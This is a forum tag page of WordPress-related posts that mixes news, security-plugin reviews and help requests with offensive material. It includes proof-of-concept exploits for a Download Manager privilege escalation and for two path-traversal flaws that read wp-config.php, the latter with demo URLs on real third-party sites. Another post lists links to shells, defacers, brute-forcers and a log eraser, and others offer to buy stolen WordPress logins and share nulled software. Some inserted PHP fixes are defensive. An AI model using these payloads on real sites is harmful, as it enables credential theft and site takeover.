Showing results for tags 'wordpress'.
  1. # Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation
     # Date: 24-11-2014
     # Software Link: https://wordpress.org/plugins/download-manager/
     # Exploit Author: Kacper Szurek
     # Contact: http://twitter.com/KacperSzurek
     # Website: http://security.szurek.pl/
     # Category: webapps
     # CVE: CVE-2014-9260

     1. Description

     Every registered user can update every WordPress option using the basic_settings() function.

         function basic_settings() {
             if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') {
                 foreach ($_POST as $optn => $optv) {
                     update_option($optn, $optv);
                 }
                 if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form');
                 die('Settings Saved Successfully');
             }
             include('settings/basic.php');
         }

     http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html

     2. Proof of Concept

     Log in as a standard user (created using wp-login.php?action=register), then:

         <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings">
             <input type="hidden" name="task" value="wdm_save_settings">
             <input type="hidden" name="section" value="basic">
             <input type="hidden" name="default_role" value="administrator">
             <input type="submit" value="Hack!">
         </form>

     After that, create a new user using wp-login.php?action=register. The newly created user will have admin privileges.

     3. Solution: Update to version 2.7.3

     Source
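     For contrast with the handler quoted in the advisory, here is a hardened version of the same settings endpoint. This is an added example, not the plugin's own code or the vendor's fix: it assumes the handler is wired to admin-ajax through the wp_ajax_wdm_settings hook, that the settings form carries a nonce field named wdm_nonce, and the option names in the allowlist are made up for illustration.

```php
<?php
// Added example, not the Download Manager plugin's code. A hardened
// replacement for the basic_settings() handler quoted in the advisory.
// Assumptions: admin-ajax.php?action=wdm_settings dispatches to the
// 'wp_ajax_wdm_settings' hook, and the settings form includes
// wp_nonce_field( 'wdm_save_settings', 'wdm_nonce' ).

function wdm_hardened_basic_settings() {
    // 1. Capability check. The vulnerable handler let any logged-in user
    //    (e.g. a self-registered subscriber) reach update_option().
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 2. Nonce check. Without it a cross-site form post from any page the
    //    administrator visits can submit settings; check_ajax_referer()
    //    terminates the request when the nonce is missing or invalid.
    check_ajax_referer( 'wdm_save_settings', 'wdm_nonce' );

    if ( ! isset( $_POST['task'] ) || 'wdm_save_settings' !== $_POST['task'] ) {
        wp_send_json_error( 'unknown task', 400 );
    }

    // 3. Allowlist. Never loop over $_POST and write every key with
    //    update_option(): that is what allowed core options such as
    //    default_role to be overwritten. Only plugin-owned options are
    //    written, each through its own sanitizer. (Option names below are
    //    assumed plugin settings, chosen for illustration.)
    $allowed = array(
        '__wpdm_login_form'     => 'absint',
        '__wpdm_download_dir'   => 'sanitize_text_field',
        '__wpdm_items_per_page' => 'absint',
    );

    foreach ( $allowed as $option => $sanitize ) {
        if ( isset( $_POST[ $option ] ) ) {
            $value = call_user_func( $sanitize, wp_unslash( $_POST[ $option ] ) );
            update_option( $option, $value );
        }
    }

    // Checkbox semantics kept from the original: an unchecked box means
    // the option is removed rather than left at its previous value.
    if ( ! isset( $_POST['__wpdm_login_form'] ) ) {
        delete_option( '__wpdm_login_form' );
    }

    wp_send_json_success( 'Settings Saved Successfully' );
}
add_action( 'wp_ajax_wdm_settings', 'wdm_hardened_basic_settings' );
```

     With the capability check, nonce and allowlist in place, a request carrying default_role=administrator is simply ignored, so self-registration no longer yields an administrator account.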
  2. Guest

     78 WordPress and HTML Themes

     Free 78 WordPress and HTML Themes. Download: http://www.mediafire.com/download/mjyys6kiobpu076/Themes.rar
  3. More than one million websites that run on the WordPress content management application run the risk of being completely hijacked by attackers exploiting a critical vulnerability in most versions of a plugin called WP-Slimstat.

     Versions prior to the recently released Slimstat 3.9.6 contain a readily guessable key that's used to sign data sent to and from visiting end-user computers, according to a blog post published Tuesday by Web security firm Sucuri. The result is a SQL injection vector that can be used to extract highly sensitive data, including encrypted passwords and the encryption keys used to remotely administer websites.

     "If your website uses a vulnerable version of the plugin, you're at risk," Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri, wrote. "Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover)."

     The WP-Slimstat secret key is nothing more than the MD5 hash of the plugin's installation timestamp. An attacker could use the Internet Archive or similar sites to determine the year a vulnerable site was put online. That would leave an attacker with about 30 million values to test, an undertaking that could be completed in about 10 minutes. Once the secret key has been divined, the attacker can use it to pull data out of the database.

     WP-Slimstat is an analytics tool. Its listing on WordPress shows it has been downloaded more than 1.3 million times. People who operate websites that use the plugin should update immediately.

     Post updated to change headline. It previously read: More than 1 million WordPress websites imperiled by critical plugin bug.

     Source
  4. As the title says. I am looking for a WordPress expert. I have a site where some divs need to be arranged, a few changes of the (recent posts) type etc., plus an import into the database from a txt file. I estimate 1-2 days of work at most. I would like a dynamic collaboration, possibly via microphone/Skype. I pay in advance, and we set the price by mutual agreement.
  5. WordPress is the most popular CMS (Content Management System) available online nowadays, used by the vast majority of all sites. If you have a look at this report, WordPress holds the lion's share (60.6%) of the sites whose CMS we know and a total of 23.4% of all sites. It is easy to use and it offers great flexibility, with both ready-made and custom templates and a plethora of plugins to put into effect. Moreover, WordPress provides its users with the opportunity to enhance the SEO-friendly (and thus Google-friendly) nature of their site pretty smoothly, and it also offers mobile-friendly themes. These are some of the major reasons why WordPress has been characterized as one of the most successful CMS options to date, and this is why it is the number one choice for many web designers, developers, tech freaks and even novices and tech-illiterate people who seek a simple yet effective tool for creating their site.

     Due to its exponential growth and its universal popularity, WordPress is not immune to threats and hacking attempts. It is true that the more popular something is, the more likely it is that others will seek to compromise it in the long run. This is why it is not that rare a phenomenon to hear about WordPress sites having been hacked and not being able to function properly. Before we continue with our guide about cleaning up WordPress, it is important that we truly understand what website hacking is and what it can do to your site and your computer.

     What Website Hacking Is, and How It Affects You

     There are two major types of website hacking that you should beware of, in order to ensure that you offer the best user experience to every single visitor and do not compromise his or her overall security:

     The first type has to do with the establishment of a backdoor; this means that the hacker leaves room for returning to your site whenever he feels like it and gaining access to places that should be out of reach for him. The difficulty in tracing this type of website hacking lies in the fact that this backdoor is not visible to the naked eye, and thus it can go unnoticed for a truly long time.

     The second type involves the deterioration of user experience and the compromise of your site directly from the source. The visitors that click on your site can be redirected to other sites or get pop-ups on their screen as soon as they head to your home page. In addition, malware can be installed silently on the computers of your site's visitors, and of course this is never a good thing.

     Now that we have comprehended what goes on in cases of WordPress sites being hacked, and before moving on to the process of WordPress database cleanup, it is time to highlight the signs that should alarm you that something is wrong with your site.

     Signs that Reveal a Potential WordPress Hack

     Even though the signs are not a perfect match to every single WordPress site that has been compromised, they offer some truly helpful information that should get you on your feet and urge you to dig deeper and see whether or not your site has indeed been hacked. Let's see these signs in the form of bullets:

       • Problems with e-mails: The hackers will start sending e-mails from your site, and you will most probably be blocked as a spam mailer. This can affect your communication with others, as you will not even have a clue about your e-mail activity.
       • Bad content added to WP: You cannot control what content is added to your site, and this is in fact one of the major factors that ought to urge you to start cleaning up the mess.
       • Slow performance or crash: This is another indicator that you are in need of a WordPress clean-up after a hack. If you are experiencing very slow performance or if you see that your site has crashed, you should look no further.
       • Traffic drops significantly: You will most likely observe that you get no traffic at all or you have lost most of your visitors from one day to the next. Unless you have dealt with a matter of bad reputation recently, this should alarm you.
       • Website disappears: This is the most shocking sign that your site has been under attack. In some cases, the hackers remove everything from the site and thus take it down.

     As soon as you have noticed some of these signs, it is high time to take matters into your own hands. Though this process is neither easy nor simple to complete, you can in fact repair your WordPress site and make sure that you shield it against any future acts of this sort.

     How to Repair Your Hacked WordPress Site

     From the very moment you determine that your WordPress site has been hacked, you need to take some immediate actions and start working toward cleaning everything up and securing your digital premises. Let's have a look at what it takes for you to accomplish that:

       • Restore Your Site via Upgrade and Reinstallation: Make use of your backup and restore your site, so that it can keep running. Upon doing so, you need to be thorough while reinstalling all the plugins and additional tools that you have been using so far. It is important to reinstall them and then upgrade them to the latest version.
       • Scan and Clean Up Your Machine: If you had not installed an anti-virus program, please DO! This is essential, in order to highlight any red flags for you to consider. Scan your machine in detail and fix any problems that emerge.
       • Change All the Passwords: Do not be sloppy when it comes to cleaning up WordPress. On the contrary, you ought to be really scholastic and change all the passwords that you have been using in e-mail accounts, financial transactions and anywhere else. Of course, it goes without saying that you need to change the WP administrator password and get a new one (rather than the default that many users don't mind keeping).
       • Back Up Everything: Besides being able to restore your site in the event of hacking or crashing, you can compare the backups with your current WP site and check for any alterations whatsoever.
       • Check the wp-config.php File: If you come across any modifications when comparing your file with the wp-config-sample.php file, you had better change them.
       • Engage in Premium Security Solutions: Although it can be tempting to handle your WordPress site and its maintenance on your own or make use of your son's talent or the wit of your best friend, such options generally come with a greater percentage of risk. Instead, consider premium security solutions that will safeguard your site and deal with the proper WordPress maintenance required.
       • Any Uploaded File Should Be Copied: This will allow you to keep everything under control. Even in the discomforting event of a crash or any other problem getting in the way, you will know that you have got copies to turn to.
       • Fresh, New Version of WordPress: Do not settle for older versions of WordPress. Instead, be sure to get updates and have the latest version of WordPress that has fixed security issues and can keep you thoroughly protected.
       • Go through Every Post: This can take some time, but it is worth the trouble. You should go through every post of yours and identify any problem, in order to deal with it effectively.

     How to Protect Your Site from Any Future Attack

     As hacking is not a one-time deal, you will have to comply with some security precautions that help you keep everything perfectly secured on your WordPress site. Below are some pieces of advice that you ought to consider for protecting your WordPress website from any malicious intent:

       • Restrict Administrative Privileges: The fewer the people who access your admin panel, the less likely it will be for breaches to occur.
       • Scan on a Daily Basis: If you are vigilant and you do not neglect scanning your site daily for bugs and other vulnerabilities, the hack is less likely to succeed.
       • Use Secured Protocols: Instead of connecting with the use of FTP, you can go for SFTP or SSH to ensure that it is infinitely more difficult for somebody to track you down.
       • Use 2-Step Verification: Make sure that you enhance your site's security using 2-step verification. This will result in the hacker requiring much bigger effort to access your site.
       • Disable PHP Execution: You can find detailed instructions on how you can do that, since it will certainly help you eliminate threats in the future.

     From everything that has been analyzed in this article on cleaning up WordPress, this is a tough job; however, it is not impossible to complete, and what you gain is truly remarkable: a fully protected WordPress site that does not compromise anything in terms of security and performance!

     Source
  6. [+] AnonGhost PHP Shell
     [+] https://ghostbin.com/paste/9ckp3dst
     [+] Bypass Root Path With Zip File
     [+] https://ghostbin.com/paste/tdbvr2ug
     [+] Bypass Forbidden with Python via TCP Protocol
     [+] https://ghostbin.com/paste/qbrs9r8a
     [+] Wordpress 0day CSRF + Brute Token
     [+] https://ghostbin.com/paste/znxkcojv
     [+] Wordpress Index Hijack
     [+] https://ghostbin.com/paste/8wf2yj2v
     [+] CPanel & FTP Auto Defacer
     [+] https://ghostbin.com/paste/z6jfwrbm
     [+] Reverse IP Lookup
     [+] https://ghostbin.com/paste/kaa5na3x
     [+] Logs Eraser
     [+] https://ghostbin.com/paste/w9puv3kq
     [+] Facebook Multi-Account Bruteforce
     [+] https://ghostbin.com/paste/akn9adf8
     [+] Bypass SafeMode
     [+] https://ghostbin.com/paste/j423dffz
     [+] Skype BruteForce
     [+] https://ghostbin.com/paste/r85xqq28
     [+] Virtual Bypass Via Error_Log
     [+] https://ghostbin.com/paste/qjb2shhu
     [+] Shtml Bypass Symlink Via Error
     [+] https://ghostbin.com/paste/orqjsu6e
     [+] Bypass Users Server
     [+] https://ghostbin.com/paste/koew333z
     [+] Cpanel Mass Defacer
     [+] https://ghostbin.com/paste/nt3zc43b
     [+] Bypass Chmod Directory
     [+] https://ghostbin.com/paste/2q6vjea3
     [+] Bypass Root Path
     [+] https://ghostbin.com/paste/y8jx2hfs
     [+] Wordpress Add Admin User
     [+] https://ghostbin.com/paste/ffqvakw8
     [+] Server Informations
     [+] https://ghostbin.com/paste/om32c59z
     [+] Twitter Multi-Account Brute force
     [+] https://ghostbin.com/paste/hsmbtep8
     [+] Symlink Bypass
     [+] https://ghostbin.com/paste/ywv75o46
     [+] Bypass /etc/passwd
     [+] https://ghostbin.com/paste/6nuom97j

     Password: ./d3f4ult_v1rUsa
  7. Buying WordPress logins! PM or ICQ: 689646868. Urgent, it must be WP with IP!
  8. WordPress has become a huge target for attackers and vulnerability researchers, and with good reason. The software runs a large fraction of the sites on the Internet and serious vulnerabilities in the platform have not been hard to come by lately. But there's now a new bug that's been disclosed in all versions of WordPress that may allow an attacker to take over vulnerable sites.

     The issue lies in the fact that WordPress doesn't contain a cryptographically secure pseudorandom number generator. A researcher named Scott Arciszewski made the WordPress maintainers aware of the problem nearly eight months ago and said that he has had very little response.

     "On June 25, 2014 I opened a ticket on WordPress's issue tracker to expose a cryptographically secure pseudorandom number generator, since none was present," he said in an advisory on Full Disclosure. "For the past 8 months, I have tried repeatedly to raise awareness of this bug, even going as far as to attend WordCamp Orlando to troll^H advocate for its examination in person. And they blew me off every time."

     The consequences of an attack on the bug would be that the attacker might be able to predict the token used to generate a new password for a user's account and thus take over the account. Arciszewski has developed a patch for the problem and published it, but it has not been integrated into WordPress. Since the public disclosure, he said he has had almost no communication from the WordPress maintainers about the vulnerability, save for one tweet from a lead developer that was later deleted.

     Arciszewski said he has not developed an exploit for the issue but said that an attacker would need to be able to predict the next RNG seed in order to exploit it.

     "There is a rule in security: attacks only get better, never worse. If this is not attackable today, there is no guarantee this will hold true in 5 or 10 years. Using /dev/urandom (which is what my proposed patch tries to do, although Stefan Esser has highlighted some flaws that would require a 4th version before it's acceptable for merging) is a serious gain over a userland RNG," he said by email.

     But, as he pointed out, this kind of bug could have a lot of value for a lot of attackers.

     "WordPress runs over 20% of websites on the Internet. If I were an intelligence agency (NSA, GCHQ, KGB, et al.) I would have a significant interest in hard-to-exploit critical WordPress bugs, since the likelihood of a high-value target running it as a platform is pretty significant. That's not to say or imply that they knew about this flaw! But if they did, they probably would have sat on it forever," Arciszewski said.

     WordPress officials did not respond to questions for this story before publication.

     Source
  9. WordPress is the most popular blogging platform in the world. Millions of websites including various popular blogs are using WordPress as a content publishing platform. So, hackers are also more interested in hacking WordPress based websites. WordPress usually pushes updates to patch all the known vulnerabilities, but third party themes and plugins make WordPress vulnerable. Sometimes hackers also find vulnerabilities in WordPress that allow them to hack the whole server. In the past three months, we have seen 2 major zero-day vulnerabilities and mass hacking of WordPress websites. Thousands of websites were hacked by exploiting these vulnerabilities. There are many past examples in which a single vulnerable plugin led to the hacking of a whole web server hosting hundreds of websites. A few days back, we discussed SoakSoak malware which affected 100k websites in very little time by exploiting the vulnerability in a plugin.

     So, if you are a WordPress user, you must take care of security. You must always keep your WordPress installation updated and secure. In a previous post, I also discussed WPScanner, a tool for scanning a WordPress website and finding vulnerabilities in it. If you are a WordPress user, you can use this tool to find vulnerabilities in your website and patch them.

     In this post, I will discuss various security plugins available for WordPress. These security plugins offer a wide range of features to make your WordPress blog secure from known threats. These plugins keep their services updated with security from the latest exploits and threats. If you are really serious about your online business running on WordPress, you must use any of these plugins to make it secure. These are the 7 best security plugins available for WordPress.

     1. WordFence

     WordFence is one of the most popular WordPress security plugins. It keeps on checking your website for malware infection. It scans all the files of your WordPress core, theme and plugins. If it finds any kind of infection, it will notify you. It claims to make your WordPress website 50 times faster and secure. For making your website faster, it uses the Falcon caching engine. This plugin is free, but a few advanced features are available for premium users. If you can afford it, do it. This plugin blocks bruteforce attacks and can add two factor authentication via SMS. You can also block traffic from a specific country. It also includes a firewall to block fake traffic, botnets and scanners. It also scans your hosting for known backdoors including C99, R57 and others. If it finds anything, you will instantly get an email notification. It also scans your posts and comments for malicious code. It also supports multi-site. You can also check the traffic on your WordPress website in real time and see if there is any security threat attacking your website.

     Download WordFence

     2. BulletProof Security

     BulletProof Security is another popular WordPress security plugin that takes care of various things. It adds firewall security, database security, login security and more. It comes with a four-click setup interface. Just activate this plugin and then relax. It will take care of your website. It limits failed login attempts and blocks security scanners, fake traffic, IP blocking and code scanners. It keeps on checking the code of WordPress core files, themes and plugins. In case of any known infection, it notifies the admin. It also optimizes the performance of your website by adding caching. It comes with a built-in file manager for htaccess. It protects WordPress websites against various vulnerabilities including XSS, RFI, CRLF, CSRF, Base64, Code Injection, SQL Injection and many others. This plugin keeps itself updated with new vulnerabilities to keep your website protected. It keeps on updating according to new exploits and vulnerabilities. It also has a pro version which offers some advanced features to improve the security of your website. But the free version is popular enough to make your website secure.

     Download BulletProof Security

     3. Sucuri Security

     Sucuri Security is the security plugin for WordPress. This plugin is from the popular website security and auditing company Sucuri. This plugin offers various security features like security activity auditing, file integrity monitoring, malware scanning, blacklist monitoring, and website firewall. It incorporates various blacklist engines including Google Safe Browsing, Sucuri Labs, Norton, McAfee Site Advisor and more to check your website. If there is anything wrong, it will notify you via email. It protects your website from DOS attacks, Zero Day Disclosure Patches, bruteforce attacks and other scanner attacks. It also keeps a log of all activities and keeps these logs safe in the Sucuri cloud. So, if an attacker is able to bypass the security controls, your security logs will be safe within Sucuri's security operations center. If you are willing to pay, you can go for the Sucuri premium service. They are a well known web application security company with a team of experts. So, you can get better service and advice.

     Download Sucuri Security

     4. iThemes Security (formerly Better WP Security)

     iThemes Security is also a nice WordPress security plugin which claims to offer 30+ ways to secure and protect your WordPress website. With one click installation, you can stop automated attacks and protect your website. It also fixes various common security holes in your website. It tracks registered users' activity and adds two-factor authentication, import/export settings, password expiration, malware scanning, and various other things. It scans the entire website and tries to find if there is any potential vulnerability in your website. It also prevents bruteforce attacks and bans IP addresses which try to bruteforce. It also forces users to use secure passwords and also forces SSL for the admin area if the server supports it. Unlike other plugins, the GeoIP banning feature is not available. But the company has promised to bring this feature soon. We cannot say exactly when, but it says the feature is coming soon. It also integrates Google reCAPTCHA to prevent comment spam on your website.

     Download iThemes Security

     5. Acunetix WP SecurityScan

     Acunetix WP Security Scan is the WordPress security plugin by Acunetix. Acunetix is a well known company in web application security. It offers a security scanning tool to find vulnerabilities in web applications. This plugin helps you to secure your WordPress website and suggests measures to improve the security. It offers file permission security, version hiding, admin protection, removing the WP generator tag from the source, and database security. It removes various information from the source code of the page which can be used in the information gathering process before an attack. This includes theme update information, plugin update information, really simple discovery meta tag, WordPress version, Windows Live Writer meta tag, error information from the login page, versions from scripts, versions from stylesheets, database and php error reporting. It also offers a database backup tool to take a backup of your website. With its live traffic monitor tool, you can check traffic in real time. It also scans your website to notify you of known web application vulnerabilities.

     Download Acunetix WP SecurityScan

     6. All In One WP Security & Firewall

     All In One WP Security & Firewall is another popular WordPress security plugin to check vulnerabilities in your WordPress website. This plugin is easy to use and reduces the security risks by adding recommended security practices. It protects against bruteforce login attacks and locks down if someone tries to bruteforce. It also sends you an email notification if somebody gets locked out due to failed login attempts. It detects if a user tries to save a weak password and forces him/her to use a strong password. It also monitors the account activity of all users and keeps track of username, IP and login date and time. It also allows you to schedule automatic backups and receive email notifications. It also protects PHP code by disabling admin area editing. It adds a web application firewall to your website and enables the 5G Blacklist to prevent various attacks. It denies bad query strings, prevents XSS, CSRF, SQL injection, malicious bots and other security threats. It also has a security scanner which keeps track of files and notifies you about each change in your WordPress system. It can also detect malicious code in your WordPress website. It blocks and protects your blog from comment spam. It also works with most plugins without any problem.

     Download All In One WP Security & Firewall

     7. 6Scan Security

     6Scan Security is a popular auto-fix protection for your WordPress site. It can protect your website from hackers. It offers rule-based protection for your website and tries to keep the security of your website up to date. It has a security scanner which scans and protects your website against SQL injection, Cross Site Scripting, CSRF, Directory traversal, Remote file inclusion, DOS attacks and other OWASP top ten security vulnerabilities. A notable feature of the plugin is its automatic vulnerability fix. When it finds any vulnerable code, it applies an auto-fix by using its auto-fix server-side agent solution. It also has an automatic malware fix for malware related issues on your website. Like other plugins, it also sends email notifications if there is anything serious in your website.

     Download 6Scan Security

     Additional security measures

     Along with these WordPress plugins, you should also follow a few security measures from your side. These will help you in improving the security of your blog.

       • Always keep your WordPress installation up to date. Update your WordPress as soon as possible if there is any new WordPress update. Most of the time, hacked websites are those which are using an older version of WordPress. Older versions of WordPress always have a few known security issues. And exploits for these security issues are available for free. Even a kid can hack your website if it is running on a vulnerable version of WordPress.
       • Always keep plugins and themes added to your blog updated to the latest version. New versions always come with new features and security fixes. So, updating plugins and themes is necessary. Most of the time, these third party plugins and themes are the reason for vulnerability in WordPress websites. Attackers can exploit these plugins to gain access to your website or inject malicious script in your website.
       • Download themes and plugins only from trusted sources. Nulled themes and themes from untrusted sources generally contain malware in the code. If you install any security plugin, you will be notified, but why take the risk? Avoid any unknown source for downloading plugins and themes.
       • Avoid using the administrator username 'admin', because this is default and common. By using this username in your blog, you are making the attacker's work easier. He does not need to guess the username now, just bruteforce your website for username admin. Thanks to these plugins, bruteforce will not work anymore.
       • Always use a strong password for your WordPress account. WordPress bruteforcing tools are available. So, do not take the risk. Use a long password with capital letters, small case letters, numbers and special characters. A combination of these makes a strong password which is hard to guess.

     Conclusion

     These are a few WordPress security plugins you can use to make your WordPress blog secure. You do not need to download all these plugins. Just try any one and see if it suits you. If you are not happy with its performance, you can download any other plugin to check and use. Every single plugin offers unique security features. You will feel relaxed after having any of these plugins in your website. Malware scanning, exploit scanning and brute force protection are a few features which you must have in your website. If you have a good budget and do not want to be in technicalities, you can go for premium versions of the plugins which offer more advanced security features with detailed reports. A few plugins also offer free customer support and security assessment with the pro version. With an increasing number of hacking attacks, it is necessary to have security in your website.

     If you are a WordPress user, what security plugin do you use in your website? Share it with us in the comments.

     Source
  10. Does anyone know how to integrate vBulletin into WordPress? Is there a module? Thank you.
  11. I need someone skilled in SEO optimization, optionally WordPress installation, configuration, etc.
  12. [*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download Vulnerability
      [*] Google Dork: inurl:wp-content/themes/RedSteel
      [*] Date: 2015-01-25
      [*] Exploit Author: Ashiyane Digital Security Team
      [*] Vendor Homepage: http://www.webdesignlessons.com/redsteel-wordpress-theme/
      [*] Tested on: Windows 7
      [*] Discovered By: ACC3SS

      [*] Location: [localhost]/wp-content/themes/RedSteel/download.php?file=filename.php

      Vulnerable file: download.php

      Vulnerable code:

          <?php
          $file = @$_GET['file'];
          $parts = explode('/', $file);
          $fileName = $parts[sizeof($parts) - 1];
          if ((isset($file)) && (file_exists($file))) {
              header("Content-type: application/force-download");
              header('Content-Disposition: inline; filename="' . $fileName . '"');
              header("Content-Transfer-Encoding: Binary");
              header("Content-length: " . filesize($file));
              header('Content-Type: application/octet-stream');
              header('Content-Disposition: attachment; filename="' . $fileName . '"');
              readfile($file);
          }
          ?>

      [*] Proof:
      [*] http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
      [*] http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php

      Source
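      The root cause in the download.php above is that the user-supplied file parameter is passed straight to file_exists() and readfile(), so any path the web server can read is served. Below is a hardened replacement, added here as an example and not the theme's own code; it assumes downloadable files live in one fixed 'downloads' directory next to the script.

```php
<?php
// Added example, not the RedSteel theme's code. A safe replacement for the
// download.php quoted above. Assumption: every downloadable file lives in a
// single directory ('downloads' beside this script). Anything that does not
// resolve to a regular file inside that directory is refused.

function resolve_download( string $base_dir, string $requested ): ?string {
    // Canonicalise the allowed directory once. realpath() resolves '..'
    // segments and symlinks, so the prefix comparison below is not fooled
    // by encoded traversal or a symlink pointing outside the directory.
    $base = realpath( $base_dir );
    if ( $base === false || ! is_dir( $base ) ) {
        return null;
    }

    // Strip NUL bytes and any directory component: only a bare file name is
    // accepted, so '../../../wp-config.php' collapses to 'wp-config.php',
    // which is then looked up inside $base only.
    $name = basename( str_replace( "\0", '', $requested ) );
    if ( $name === '' || $name[0] === '.' ) {
        return null; // empty name or dotfile such as .htaccess
    }

    $path = realpath( $base . DIRECTORY_SEPARATOR . $name );
    if ( $path === false || ! is_file( $path ) ) {
        return null; // does not exist, or is not a regular file
    }

    // Belt and braces: the canonical path must still start with the
    // canonical base directory plus a separator.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ( strncmp( $path, $prefix, strlen( $prefix ) ) !== 0 ) {
        return null;
    }
    return $path;
}

function send_download( string $path ): void {
    // One consistent set of headers; the original emitted conflicting
    // Content-Type and Content-Disposition headers twice.
    header( 'Content-Type: application/octet-stream' );
    header( 'Content-Disposition: attachment; filename="'
        . rawurlencode( basename( $path ) ) . '"' );
    header( 'Content-Length: ' . filesize( $path ) );
    header( 'X-Content-Type-Options: nosniff' );
    readfile( $path );
}

$requested = isset( $_GET['file'] ) ? (string) $_GET['file'] : '';
$path      = resolve_download( __DIR__ . '/downloads', $requested );

if ( $path === null ) {
    // Same response for "outside the directory" and "does not exist", so
    // the endpoint cannot be used to probe for files elsewhere on disk.
    http_response_code( 404 );
    exit( 'Not found' );
}
send_download( $path );
```

      Because the lookup never leaves the fixed directory and unknown names get a uniform 404, a request such as file=../../../wp-config.php returns nothing about the server's layout.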
  13. [+] Title: Wordpress slider reolusion local file download [+] Date: 2015-01-25 [+] Author: JOK3R [+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/ [+] Tested on: windows 7 / firefox , kali linux / firefox [+] Vulnerable Files: /plugins/revolution-slider/ [+} Dork : "Index of" /wp-content/plugins/revolution-slider/ ### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Demo: http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Credits: [+] Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS* And All iranian Hacker's And Exploiter's <3 [+] iran-cyber.in Source
  14. I have a site where I use WordPress. In the past the site got a lot of traffic and I have ~70,000 unapproved spam comments. How would it affect me if I approved all 70,000 comments? What advantages does that give me from an SEO point of view? And what disadvantages? To clarify, the site was for PPD, the most common niche, games & hacks.
  15. WPHardening fortification is a security tool for WordPress

      Usage

      $ python wphardening.py -h

      Options:
        --version             show program's version number and exit
        -h, --help            show this help message and exit
        -v, --verbose         Active verbose mode output results
        --update              Check for WPHardening latest stable version

        Target:
          This option must be specified to modify the package WordPress.

          -d DIRECTORY, --dir=DIRECTORY
                              **REQUIRED** - Working Directory.
          --load-conf=FILE    Load file configuration.

        Hardening:
          Different tools to hardening WordPress.

          -c, --chmod         Chmod 755 in directory and 644 in files.
          -r, --remove        Remove files and directory.
          -b, --robots        Create file robots.txt
          -f, --fingerprinting
                              Deleted fingerprinting WordPress.
          -t, --timthumb      Find the library TimThumb.
          --wp-config         Wizard generated wp-config.php
          --delete-version    Deleted version WordPress.
          --plugins           Download Plugins Security.
          --proxy=PROXY       Use a HTTP proxy to connect to the target url for
                              --plugins and --wp-config.
          --indexes           It allows you to display the contents of directories.
          --malware-scan      Malware Scan in WordPress project.

        Miscellaneous:
          -o FILE, --output=FILE
                              Write log report to FILE.log

      Examples

      Check a WordPress Project
      $ python wphardening.py -d /home/path/wordpress -v

      Change permissions
      $ python wphardening.py -d /home/path/wordpress --chmod -v

      Remove files that are not used
      $ python wphardening.py -d /home/path/wordpress --remove -v

      Create your robots.txt file
      $ python wphardening.py -d /home/path/wordpress --robots -v

      Remove all fingerprinting
      $ python wphardening.py -d /home/path/wordpress --fingerprinting -v

      Check a TimThumb library
      $ python wphardening.py -d /home/path/wordpress --timthumb -v

      Create Index file
      $ python wphardening.py -d /home/path/wordpress --indexes -v

      Download Plugins security
      $ python wphardening.py -d /home/path/wordpress --plugins

      Wizard generated wp-config.php
      $ python wphardening.py -d /home/path/wordpress --wp-config

      Deleted version WordPress
      $ python wphardening.py -d /home/path/wordpress --delete-version -v

      WPHardening update
      $ python wphardening.py --update

      Use all options
      $ python wphardening.py -d /home/user/wordpress -c -r -f -t --wp-config --delete-version --indexes --plugins -o /home/user/wphardening.log

      Download: https://github.com/elcodigok/wphardening
  16. Free templates and plugins for presentation sites, Traksa.com. I will be adding entries to this thread every day. If you don't find a template here, go and check the site, there are plenty of them. Provided by the site traksa.com. I will post some themes or plugins every day in this thread.
  17. For lack of time, I will no longer be working on desktop applications. I build small and medium-sized sites, scripts, pages, bug fixes, optimizations. I write clean, commented code. UPDATE: After seeing dozens of scripts/pages made by one person or another, I can say that I write calligraphically! For complete sites I can also handle hosting and server configuration so that the site is delivered "turnkey". I also offer maintenance where needed. Backend: PHP + MySQL. Frontend: HTML + CSS + jQuery / Bootstrap. Payment methods: PayPal or bank transfer. Payment: on completion of the project or in installments, case by case. Email: net_wav3@yahoo.com Skype: wav3ee Telegram: https://t.me/wav3e
  18. Hi! I recently set up a WordPress blog, and since I haven't worked with this platform for about 2 years I think things have changed, so I'd rather ask you. Before, I used All in One SEO Pack as my SEO plugin; can you recommend a better one, or is it fine if I keep using this one? There is also SeoPressor, which I understand is very good, but it's premium. Thanks in advance!
  19. Needs .NET Framework 4.5. Link: Joomla Vulnerability Scanner Link: WPscan
  20. Visual Composer for WordPress will save you tons of time working on the site content. Now you’ll be able to create complex layouts within minutes! Sales page Demo page Download nulled
  21. Hello, I'm working on a site on the WordPress platform with the BoxOffice theme, which can be found here. The site is this one. My problem is that the pagination links at the bottom of the page lead only to a 404 error. I suspect the problem is that I'm using a custom taxonomy, namely "Filme", but I don't know how to fix it. I'm asking anyone who knows how this can be fixed and exactly what to change. Thank you very much!
  22. I need a script that keeps track every time a user registered on the site shares an article on social networks (FB, Twitter, G+ and Pinterest). Each time the user shares an article, that user's share count increases by one. The site is in WordPress and the hosting is solid.
